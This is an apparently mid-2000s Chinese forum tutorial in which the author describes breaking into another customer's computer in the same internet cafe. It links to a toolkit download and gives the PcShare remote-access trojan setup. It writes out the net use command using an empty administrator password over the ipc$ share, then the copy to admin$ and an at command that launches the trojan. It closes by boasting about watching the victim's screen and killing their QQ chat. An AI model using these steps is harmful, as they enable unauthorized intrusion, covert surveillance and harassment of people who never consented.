本次入侵所用工具在 http://chhk.vicp.net/luxiang/chhk.rar里面有提供下载。
我写这篇文章首先还要感谢浪心的提醒让我看了他那篇教程,以及工具的利用。但是在这里我没有用到 扫描工具scanipc。用的是ipc$默认共享来完成的
本次入侵的环境属于局域网同一网吧内。首先下载20CN的工具包。然后我们打开程序PcShare,设置参数 自动上线连接端口=33333
最大客户连接数量=999。然后生成客户,默认的是生成psclient。当然你也可以把名字改成其他的,我这里改成1把,方便下面的输入。
接着我们来选顶目标,呵呵~~~~~~~~我找了同一个网吧的192.168.0.6,OK。我来和它建立ipc$连接。
net use \\192.168.0.6\ipc$ "" /user:"administrators" (帐号administrators密码为空。)
出现成功提示。
这里我们就不隐射对方的盘了,直接看它系统时间net time \\192.168.0.6.
查查时间,发现192.168.0.6 的当前时间是 2004/6/25 21:30,命令成功完成。
然后我们来把刚才PcShare生成的木马程序copy到对方机,因为为了输入方便我已经把程序名改了1.
输入copy 1.exe \\192.168.0.6\admin$ 这个命令的已经就是把1.exe复制到目标192.168.0.6的系统目录下。
接着我们用at命令启动1.exe。at \\192.168.0.6 21:35 1.exe(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
好了,入侵已经完成一半了,接着我们就等对方的1.exe程序运行了后让它来主动连接我们了。~~~~~~~~~~~这段时间偶也去听歌放松一下。
OK!5分钟已过,我们打开PcShare看一下,呵呵~~~~~看到什么了。对方192.168.0.6已经连接上了。下面要做什么就随便你了,我来看一下屏幕控制,看他小子在做些什么。
这个屏幕控制可是活动的哦,不论对方输入了什么都可以看到。我KAO~~~原来在泡MM,我耍他一下,打开进程列表,找到QQ的进程然后结束它。让那傻小子自己在那郁闷去把。
这个软件还有其他一些功能我这里就不怎么说了,但美中不足的就是不可以远程开关机。
本来还想搞对方一下的,但是看来没办法了啊!呵呵~~~~~~~~~
|